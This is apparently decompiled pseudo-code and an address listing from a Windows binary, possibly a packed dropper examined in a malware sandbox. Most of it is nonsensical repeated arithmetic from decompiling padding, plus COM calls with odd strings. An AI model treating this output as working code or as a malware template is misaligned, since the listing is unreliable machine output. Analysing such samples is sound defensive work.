				 *((intOrPtr*)(_t748 + 0x2c)) =  *((intOrPtr*)(_t748 + 0x2c)) + _t730;
				_t554 = _t549 + 3;
				 *0x0000002E =  *((intOrPtr*)(0x2e)) + _t554;
				_t555 = _t554 + 1;
				 *((intOrPtr*)(_t555 + 0x2c)) =  *((intOrPtr*)(_t555 + 0x2c)) + _t730;
				_a44 = _a44 + 2;
				 *((intOrPtr*)(_t730 - 0x68ffbfd4)) =  *((intOrPtr*)(_t730 - 0x68ffbfd4)) + _t697;
				_t558 = _t555 + 2 - 0x40;
				 *((intOrPtr*)(_t777 +  &_a749797440)) =  *((intOrPtr*)(_t777 +  &_a749797440)) + _t558;
				 *((intOrPtr*)(_t748 - 0x34ffbfd4)) =  *((intOrPtr*)(_t748 - 0x34ffbfd4)) + 2;
				_t562 = _t558 + 1 - 0x40 + 2 - 0x40;
				_t698 = _t697 + _t562;
				_t731 = _t730 + _t730;
				_a756613184 = _a756613184 + _t698;
				_t566 = _t562 - 0xffffffffffffffc0 + 1;
				 *_t748 =  *_t748 + _t566;
				_t568 = _t566 - 0x2d330040 + 1;
				 *((intOrPtr*)(_t568 + 0x2d)) =  *((intOrPtr*)(_t568 + 0x2d)) + _t568;
				_a45 = _a45 + _t698;
				 *((intOrPtr*)(_t731 + 0x2d)) =  *((intOrPtr*)(_t731 + 0x2d)) + 4;
				_t571 = _t568 + 3;
				 *((intOrPtr*)(_t734 + 0x2d)) =  *((intOrPtr*)(_t734 + 0x2d)) + _t571;
				_t572 = _t571 + 1;
				 *((intOrPtr*)(_t698 - 0x71ffbfd3)) =  *((intOrPtr*)(_t698 - 0x71ffbfd3)) + _t572;
				_t574 = _t572 - 0x2ddc0040 + 1;
				 *_t574 =  *_t574 + _t574;
				 *_t574 =  *_t574 + _t574;
				 *((intOrPtr*)(_t748 + 0x26140040)) =  *((intOrPtr*)(_t748 + 0x26140040)) + _t731;
				_t575 = _t574 + 1;
				 *((intOrPtr*)(_t575 + 0x44)) =  *((intOrPtr*)(_t575 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t576 = _t575 + 1;
				 *((intOrPtr*)(_t576 + 0x18)) =  *((intOrPtr*)(_t576 + 0x18)) + _t576;
				_t577 = _t576 + 1;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *_t577 =  *_t577 + _t577;
				 *((intOrPtr*)(_t748 + 0x26140040)) =  *((intOrPtr*)(_t748 + 0x26140040)) + 4;
				_t578 = _t577 + 1;
				 *((intOrPtr*)(_t578 + 0x44)) =  *((intOrPtr*)(_t578 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t579 = _t578 + 1;
				 *((intOrPtr*)(_t579 + 0x18)) =  *((intOrPtr*)(_t579 + 0x18)) + _t579;
				_t580 = _t579 + 1;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t580 =  *_t580 + _t580;
				 *_t748 =  *_t748 + _t731;
				_t583 = _t580 + _t580 + 2;
				 *((intOrPtr*)(_t583 + 0x44)) =  *((intOrPtr*)(_t583 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t584 = _t583 + 1;
				 *((intOrPtr*)(_t584 + 0x18)) =  *((intOrPtr*)(_t584 + 0x18)) + _t584;
				_t585 = _t584 + 1;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t585 =  *_t585 + _t585;
				 *_t734 =  *_t734 + _t698;
				 *_t748 =  *_t748 + _t731;
				_t587 = _t585 + 2;
				 *((intOrPtr*)(_t587 + 0x44)) =  *((intOrPtr*)(_t587 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t588 = _t587 + 1;
				 *((intOrPtr*)(_t588 + 0x18)) =  *((intOrPtr*)(_t588 + 0x18)) + _t588;
				_t589 = _t588 + 1;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t589 =  *_t589 + _t589;
				 *_t734 =  *_t734 + _t731;
				 *_t748 =  *_t748 + _t731;
				_t591 = _t589 + 2;
				 *((intOrPtr*)(_t591 + 0x44)) =  *((intOrPtr*)(_t591 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t592 = _t591 + 1;
				 *((intOrPtr*)(_t592 + 0x18)) =  *((intOrPtr*)(_t592 + 0x18)) + _t592;
				_t593 = _t592 + 1;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t593 =  *_t593 + _t593;
				 *_t731 =  *_t731 + 4;
				_t594 = _t593 - 0x40;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *_t594 =  *_t594 + _t594;
				 *((intOrPtr*)(_t734 + 0x40)) =  *((intOrPtr*)(_t734 + 0x40)) + 4;
				 *_t748 =  *_t748 + _t731;
				_t595 = _t594 + 1;
				 *((intOrPtr*)(_t595 + 0x44)) =  *((intOrPtr*)(_t595 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t596 = _t595 + 1;
				 *((intOrPtr*)(_t596 + 0x18)) =  *((intOrPtr*)(_t596 + 0x18)) + _t596;
				_t597 = _t596 + 1;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *_t597 =  *_t597 + _t597;
				 *((intOrPtr*)(_t734 + 0x26140040)) =  *((intOrPtr*)(_t734 + 0x26140040)) + _t597;
				_t598 = _t597 + 1;
				 *((intOrPtr*)(_t598 + 0x44)) =  *((intOrPtr*)(_t598 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t599 = _t598 + 1;
				 *((intOrPtr*)(_t599 + 0x18)) =  *((intOrPtr*)(_t599 + 0x18)) + _t599;
				_t600 = _t599 + 1;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *_t600 =  *_t600 + _t600;
				 *((intOrPtr*)(_t734 + 0x26140040)) =  *((intOrPtr*)(_t734 + 0x26140040)) + _t698;
				_t601 = _t600 + 1;
				 *((intOrPtr*)(_t601 + 0x44)) =  *((intOrPtr*)(_t601 + 0x44)) + _t731;
				 *((intOrPtr*)(_t731 + 0x18)) =  *((intOrPtr*)(_t731 + 0x18)) + 4;
				_t602 = _t601 + 1;
				 *((intOrPtr*)(_t602 + 0x18)) =  *((intOrPtr*)(_t602 + 0x18)) + _t602;
				_t603 = _t602 + 1;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *_t603 =  *_t603 + _t603;
				 *((intOrPtr*)(_t698 - 0xfbdb94)) =  *((intOrPtr*)(_t698 - 0xfbdb94)) + _t603;
				 *_t603 =  *_t603 + 1;
				 *((intOrPtr*)(_t698 + _t698 -  *((intOrPtr*)(_t731 + 2)) - 0xfbdb94)) =  *((intOrPtr*)(_t698 + _t698 -  *((intOrPtr*)(_t731 + 2)) - 0xfbdb94)) + _t603;
				 *_t603 =  *_t603 + 1;
				asm("aaa");
				_t778 = _t777 - 1;
				_v44 = _v44 - 0xffff;
				_t779 = _t778 - 0xc;
				 *[fs:0x0] = _t779;
				L004015F0();
				_v64 = _t779;
				_v60 = 0x4011e0;
				_v56 = 0;
				 *((intOrPtr*)( *_v44 + 4))(_v44, _t734, _t748, 4, 0x7c,  *[fs:0x0], 0x4015f6, _t757);
				_v116 =  *0x4011d8;
				_v124 = 5;
				_t610 =  &_v124;
				_push(_t610);
				L004017EE();
				L0040183C();
				_push(_t610);
				_push(L"Double");
				L004017F4();
				asm("sbb eax, eax");
				_v160 =  ~( ~( ~_t610));
				L0040182A();
				L00401824();
				if(_v160 != 0) {
					_push(0);
					_push(L"Caption");
					_push(0);
					_push(L"Opsione12");
					_push( &_v44);
					_t621 =  &_v76;
					_push(_t621);
					L00401830();
					_push(_t621);
					_push( &_v92);
					L004017E8();
					_t784 = _t779 + 0x20;
					if( *0x435744 != 0) {
						_v140 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v140 = 0x435744;
					}
					_t381 =  &_v140; // 0x435744
					_v112 =  *((intOrPtr*)( *_t381));
					_t628 =  *((intOrPtr*)( *_v112 + 0x4c))(_v112,  &_v60);
					asm("fclex");
					_v116 = _t628;
					if(_v116 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40341c);
						_push(_v112);
						_push(_v116);
						L00401800();
						_v144 = _t628;
					}
					_v120 = _v60;
					_t632 =  &_v52;
					L004017E2();
					_t635 =  *((intOrPtr*)( *_v120 + 0x24))(_v120, L"STRIPTEASING", _t632, _t632,  &_v92,  &_v56);
					asm("fclex");
					_v124 = _t635;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x403494);
						_push(_v120);
						_push(_v124);
						L00401800();
						_v148 = _t635;
					}
					_v136 = _v56;
					_v56 = _v56 & 0x00000000;
					L0040183C();
					L0040182A();
					L004017FA();
					_push( &_v92);
					_push( &_v76);
					_push(2);
					L00401842();
					_t779 = _t784 + 0xc;
				}
				_push(0);
				_push(L"Style");
				_push(0);
				_push(L"Opsione18");
				_push( &_v44);
				_t616 =  &_v76;
				_push(_t616);
				L00401830();
				_push(_t616);
				_t617 =  &_v92;
				_push(_t617);
				L004017E8();
				_push(_t617);
				L004017DC();
				_v28 = _t617;
				_push( &_v92);
				_t619 =  &_v76;
				_push(_t619);
				_push(2);
				L00401842();
				asm("wait");
				_push(0x427ba4);
				L00401824();
				L0040182A();
				return _t619;
			}

0x0040186c
0x0040186c
0x0040186c
0x00401871
0x00401876
0x00401878
0x0040187a
0x0040187c
0x0040187e
0x00401880
0x00401881
0x00401883
0x00401885
0x00401887
0x0040188d
0x0040188e
0x00401890
0x00401891
0x00401895
0x00401897
0x0040189c
0x0040189e
0x004018a0
0x004018a2
0x004018a3
0x004018a5
0x004018a6
0x004018a6
0x004018a9
0x004018ab
0x004018b5
0x004018b6
0x004018b8
0x004018b8
0x004018ba
0x004018bc
0x004018be
0x004018c0
0x004018c2
0x004018c4
0x004018cb
0x004018cd
0x004018d4
0x004018e4
0x004018ea
0x004018ec
0x004018ed
0x004018ed
0x004018f0
0x004018f0
0x004018f0
0x004018f1
0x004018f3
0x004018f5
0x004018f7
0x004018f9
0x004018fb
0x004018fd
0x004018ff
0x00401901
0x00401903
0x00401905
0x00401907
0x00401909
0x0040190b
0x0040190d
0x0040190d
0x0040190e
0x00401910
0x00401912
0x00401914
0x00401916
0x00401918
0x00401918
0x0040191a
0x0040191c
0x0040191e
0x00401920
0x00401920
0x00401921
0x00401922
0x00401925
0x00401926
0x0040198c
0x0040198c
0x0040198c
0x0040198e
0x00000000
0x00401990
0x00401990
0x00000000
0x00401994
0x00401994
0x00000000
0x00401994
0x00401990
0x00401928
0x00401928
0x00401996
0x00401996
0x00401997
0x004019a3
0x004019a5
0x004019a7
0x004019a8
0x004019aa
0x004019ac
0x004019ae
0x004019af
0x00000000
0x004019b1
0x004019b8
0x004019b9
0x004019bc
0x004019bd
0x004019bf
0x004019c1
0x004019c2
0x004019c3
0x004019c5
0x004019c6
0x004019c7
0x004019c8
0x004019d3
0x004019d8
0x004019da
0x004019dc
0x004019de
0x004019de
0x004019df
0x00000000
0x004019e1
0x004019e1
0x004019e8
0x004019e9
0x004019eb
0x004019eb
0x004019eb
0x004019ef
0x00000000
0x004019f2
0x004019f2
0x00000000
0x004019f4
0x004019f4
0x00000000
0x00000000
0x00000000
0x00000000
0x004019f4
0x004019f2
0x004019ef
0x004019df
0x0040192a
0x0040192a
0x0040192d
0x00401934
0x0040193e
0x0040193f
0x00401941
0x00401942
0x00401947
0x00401948
0x0040194a
0x0040194c
0x0040194d
0x00401950
0x00401957
0x00401958
0x0040195a
0x0040195b
0x0040195e
0x0040195f
0x00401960
0x00401961
0x00401967
0x0040196a
0x00401970
0x00401972
0x00401978
0x0040197e
0x00401980
0x00401981
0x004019f6
0x004019f6
0x004019fb
0x004019fd
0x004019fe
0x004019fe
0x00401a00
0x00401a00
0x00401a02
0x00401a04
0x00401a06
0x00401a07
0x00401a09
0x00401a0c
0x00401a0c
0x00401a0f
0x00401a7a
0x00401a7c
0x00401a7d
0x00401a7f
0x00401a81
0x00401a82
0x00000000
0x00401a11
0x00401a11
0x00401a12
0x00401a13
0x00401a1a
0x00401a1a
0x00401a1d
0x00401a83
0x00401a83
0x00401a85
0x00401a93
0x00401a95
0x00401a97
0x00401a99
0x00401a9b
0x00401a9c
0x00401a9e
0x00401a9f
0x00401aa8
0x00401aa9
0x00000000
0x00401aa9
0x00401a1f
0x00401a24
0x00401a24
0x00401a30
0x00401a32
0x00401a34
0x00401a36
0x00401a38
0x00401a3a
0x00401a3f
0x00401aaa
0x00401aaa
0x00401aac
0x00401aae
0x00401ab1
0x00401ab2
0x00401ab3
0x00401ab4
0x00401aba
0x00000000
0x00401a41
0x00401a41
0x00401a42
0x00401a43
0x00401a46
0x00401a48
0x00401a48
0x00401a4e
0x00401ac3
0x00401ac3
0x00401ac5
0x00000000
0x00401a50
0x00401a50
0x00401ac6
0x00401ac6
0x00401ac8
0x00401ac9
0x00000000
0x00401a52
0x00401a52
0x00401a54
0x00401a54
0x00401abb
0x00401abb
0x00401abd
0x00401abf
0x00401ac2
0x00000000
0x00401a56
0x00401a56
0x00401acb
0x00401acb
0x00401acc
0x00401acd
0x00401ad2
0x00401ad5
0x00401ad6
0x00401ad7
0x00401ad8
0x00401ada
0x00401adc
0x00401ade
0x00401ae0
0x00401ae1
0x00401ae3
0x00000000
0x00401a58
0x00401a58
0x00401a5b
0x00401a5b
0x00401a5c
0x00401a63
0x00401a63
0x00401a65
0x00401a67
0x00401a68
0x00401a69
0x00401a69
0x00401a6b
0x00401a6c
0x00401a6e
0x00401a6f
0x00401ae4
0x00401ae4
0x00401ae6
0x00401ae7
0x00401ae9
0x00401aed
0x00401af2
0x00401af4
0x00401af6
0x00401af8
0x00401afa
0x00401afc
0x00401afe
0x00401b00
0x00401b01
0x00401b03
0x00401b06
0x00401b07
0x00401b09
0x00401b0b
0x00401b0d
0x00401b0e
0x00401b10
0x00401b12
0x00401a71
0x00401a71
0x00401a78
0x00401a79
0x00000000
0x00401a79
0x00401a6f
0x00401a56
0x00401a54
0x00401a50
0x00401a4e
0x00401a3f
0x00401a1d
0x00401983
0x00401983
0x0040198a
0x0040198b
0x00000000
0x0040198b
0x00401981
0x00401928
0x00401b14
0x00401b16
0x00401b18
0x00401b1a
0x00401b1c
0x00401b1e
0x00401b1f
0x00401b21
0x00401b25
0x00401b2a
0x00401b2c
0x00401b2e
0x00401b30
0x00401b32
0x00401b34
0x00401b36
0x00401b38
0x00401b39
0x00401b3b
0x00401b3d
0x00401b3e
0x00401b3f
0x00401b41
0x00401b43
0x00401b46
0x00401b47
0x00401b49
0x00401b4b
0x00401b4d
0x00401b4f
0x00401b51
0x00401b53
0x00401b56
0x00401b57
0x00401b59
0x00401b5d
0x00401b62
0x00401b64
0x00401b66
0x00401b68
0x00401b6a
0x00401b6c
0x00401b6e
0x00401b70
0x00401b72
0x00401b73
0x00401b77
0x00401b79
0x00401b7b
0x00401b7d
0x00401b7e
0x00401b7f
0x00401b81
0x00401b83
0x00401b85
0x00401b87
0x00401b89
0x00401b8b
0x00401b91
0x00401b94
0x00401b9a
0x00401b9c
0x00401b9e
0x00401ba0
0x00401ba2
0x00401ba4
0x00401ba6
0x00401baa
0x00401bab
0x00401baf
0x00401bb1
0x00401bb3
0x00401bb9
0x00401bbb
0x00401bbd
0x00401bbf
0x00401bc1
0x00401bc3
0x00401bc5
0x00401bc8
0x00401bca
0x00401bcf
0x00401bd1
0x00401bd3
0x00401bd5
0x00401bd7
0x00401bd9
0x00401bdb
0x00401bdd
0x00401bdf
0x00401be2
0x00401be3
0x00401be9
0x00401beb
0x00401bee
0x00401bef
0x00401bf1
0x00401bf3
0x00401bf5
0x00401bf7
0x00401bf9
0x00401bfb
0x00401bfd
0x00401bff
0x00401c01
0x00401c05
0x00401c0a
0x00401c0c
0x00401c0e
0x00401c10
0x00401c12
0x00401c14
0x00401c16
0x00401c18
0x00401c1a
0x00401c1b
0x00401c21
0x00401c23
0x00401c25
0x00401c26
0x00401c27
0x00401c29
0x00401c2b
0x00401c2d
0x00401c2f
0x00401c31
0x00401c33
0x00401c35
0x00401c37
0x00401c39
0x00401c3d
0x00401c42
0x00401c44
0x00401c46
0x00401c48
0x00401c4a
0x00401c4c
0x00401c4e
0x00401c50
0x00401c51
0x00401c52
0x00401c53
0x00401c59
0x00401c5d
0x00401c5e
0x00401c5f
0x00401c61
0x00401c63
0x00401c65
0x00401c67
0x00401c69
0x00401c6b
0x00401c6e
0x00401c6f
0x00401c71
0x00401c75
0x00401c7a
0x00401c7c
0x00401c7e
0x00401c80
0x00401c82
0x00401c84
0x00401c86
